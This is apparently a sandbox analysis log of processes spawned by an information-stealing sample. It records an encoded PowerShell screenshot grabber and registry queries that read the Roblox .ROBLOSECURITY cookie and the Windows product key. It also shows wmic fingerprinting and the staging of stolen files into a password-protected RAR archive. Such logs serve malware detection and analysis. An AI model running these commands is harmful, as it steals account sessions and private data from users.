                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:43
                                                      Start time:20:22:09
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
                                                      Imagebase:0x7ff704e80000
                                                      File size:2'759'232 bytes
                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:44
                                                      Start time:20:22:09
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
                                                      Imagebase:0x7ff7370c0000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:45
                                                      Start time:20:22:10
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:46
                                                      Start time:20:22:10
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:47
                                                      Start time:20:22:10
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:48
                                                      Start time:20:22:10
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:49
                                                      Start time:20:22:10
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\getmac.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:getmac
                                                      Imagebase:0x7ff648c40000
                                                      File size:90'112 bytes
                                                      MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:50
                                                      Start time:20:22:10
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tree.com
                                                      Wow64 process (32bit):false
                                                      Commandline:tree /A /F
                                                      Imagebase:0x7ff6af5c0000
                                                      File size:20'992 bytes
                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:51
                                                      Start time:20:22:11
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:52
                                                      Start time:20:22:11
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:53
                                                      Start time:20:22:11
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tree.com
                                                      Wow64 process (32bit):false
                                                      Commandline:tree /A /F
                                                      Imagebase:0x7ff6af5c0000
                                                      File size:20'992 bytes
                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:54
                                                      Start time:20:22:11
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:55
                                                      Start time:20:22:11
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:56
                                                      Start time:20:22:11
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tree.com
                                                      Wow64 process (32bit):false
                                                      Commandline:tree /A /F
                                                      Imagebase:0x7ff6af5c0000
                                                      File size:20'992 bytes
                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:57
                                                      Start time:20:22:12
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:58
                                                      Start time:20:22:12
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:59
                                                      Start time:20:22:12
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:60
                                                      Start time:20:22:12
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tree.com
                                                      Wow64 process (32bit):false
                                                      Commandline:tree /A /F
                                                      Imagebase:0x7ff6af5c0000
                                                      File size:20'992 bytes
                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:61
                                                      Start time:20:22:12
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:62
                                                      Start time:20:22:12
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:63
                                                      Start time:20:22:13
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:64
                                                      Start time:20:22:13
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:65
                                                      Start time:20:22:13
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:66
                                                      Start time:20:22:16
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:67
                                                      Start time:20:22:16
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:68
                                                      Start time:20:22:16
                                                      Start date:03/08/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
                                                      Imagebase:0x7ff7f7e80000
                                                      File size:630'736 bytes
                                                      MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:70
                                                      Start time:20:22:18
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:71
                                                      Start time:20:22:18
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:72
                                                      Start time:20:22:18
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wmic os get Caption
                                                      Imagebase:0x7ff6e8540000
                                                      File size:576'000 bytes
                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:73
                                                      Start time:20:22:19
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:74
                                                      Start time:20:22:19
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:75
                                                      Start time:20:22:20
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wmic computersystem get totalphysicalmemory
                                                      Imagebase:0x7ff6e8540000
                                                      File size:576'000 bytes
                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:76
                                                      Start time:20:22:21
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:77
                                                      Start time:20:22:21
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:78
                                                      Start time:20:22:21
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wmic csproduct get uuid
                                                      Imagebase:0x7ff6e8540000
                                                      File size:576'000 bytes
                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:79
                                                      Start time:20:22:22
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:80
                                                      Start time:20:22:22
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:81
                                                      Start time:20:22:22
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:82
                                                      Start time:20:22:23
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:83
                                                      Start time:20:22:23
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:84
                                                      Start time:20:22:23
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wmic path win32_VideoController get name
                                                      Imagebase:0x7ff6e8540000
                                                      File size:576'000 bytes
                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:85
                                                      Start time:20:22:24
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:86
                                                      Start time:20:22:24
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:87
                                                      Start time:20:22:24
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
